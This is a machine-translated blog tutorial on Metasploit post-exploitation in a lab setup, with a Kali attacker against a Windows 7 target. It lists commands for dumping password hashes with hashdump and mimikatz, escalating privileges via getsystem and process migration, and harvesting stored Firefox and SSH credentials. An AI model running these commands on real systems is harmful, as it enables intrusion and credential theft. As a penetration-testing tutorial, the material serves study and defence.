当前位置:网站首页>Intranet information collection of Intranet penetration (3)
Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Ordinary users are entitled to
Intranet information collection of Intranet penetration ( Four )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump //system The powers of the meterpreter
set session 1
exploit // The results are stored in tmp Under the table of contents
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
User name :RID:LM-HASH value :NT-HASH value
rid yes windows The system account corresponds to a fixed value , Be similar to linux Of uid,gid Number ,500 by administartor,501 by guest etc. . and lm-hash and nt-hash, They all encrypt user passwords , But the encryption method is different
hashdump It uses mimikatz Part of the function of
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Ordinary users are entitled to
getuid
View user permissions
hashdump
Need administrator's permission
getsystem
It's just that on the surface, it has obtained administrator permission , Do not have some real administrator privileges
ps
Check the process
getpid
View the current process
migrate
Process migration ( Migrate ordinary user processes to administrator user processes )
hashdump
08other
Determine whether the target host is a virtual machine :
run checkvm
Get the software installation information on the target host :
run post/windows/gather/enum_applications
Get the most recently accessed documents on the target host 、 Link information :
run post/windows/gather/dumplinks
View the target environment information :
run post/windows/gather/env
see firefox Account and password stored in :
run post/windows/gather/firefox_creds
see ssh Ciphertext information of account password 、 Certificate information :
run post/windows/gather/ssh_creds
边栏推荐
- New version of postman flows [introductory teaching chapter 01 send request]
- HackMyvm靶机系列(5)-warez
- 《统计学》第八版贾俊平第十章方差分析知识点总结及课后习题答案
- Only 40% of the articles are original? Here comes the modification method
- 记一次,修改密码逻辑漏洞实战
- HackMyvm靶机系列(2)-warrior
- Library management system
- xray與burp聯動 挖掘
- Captcha killer verification code identification plug-in
- 浅谈漏洞发现思路
猜你喜欢
《統計學》第八版賈俊平第七章知識點總結及課後習題答案
JVM memory model concept
Hackmyvm target series (2) -warrior
xray与burp联动 挖掘
Hackmyvm target series (1) -webmaster
7-5 staircase upgrade (PTA program design)
《统计学》第八版贾俊平第十二章多元线性回归知识点总结及课后习题答案
Interpretation of iterator related "itertools" module usage
《统计学》第八版贾俊平第十章方差分析知识点总结及课后习题答案
中间件漏洞复现—apache
随机推荐
Web vulnerability - File Inclusion Vulnerability of file operation
Attach the simplified sample database to the SQLSERVER database instance
C language file operation
Strengthen basic learning records
小程序web抓包-fiddler
Proceedingjoinpoint API use
msf生成payload大全
Xray and Burp linked Mining
中间件漏洞复现—apache
Data mining - a discussion on sample imbalance in classification problems
MSF generate payload Encyclopedia
. Net6: develop modern 3D industrial software based on WPF (2)
搭建域环境(win)
Intel oneapi - opening a new era of heterogeneity
HackMyvm靶机系列(7)-Tron
New version of postman flows [introductory teaching chapter 01 send request]
7-3 construction hash table (PTA program design)
JVM memory model concept
Applet Web Capture -fiddler
Constants, variables, and operators of SystemVerilog usage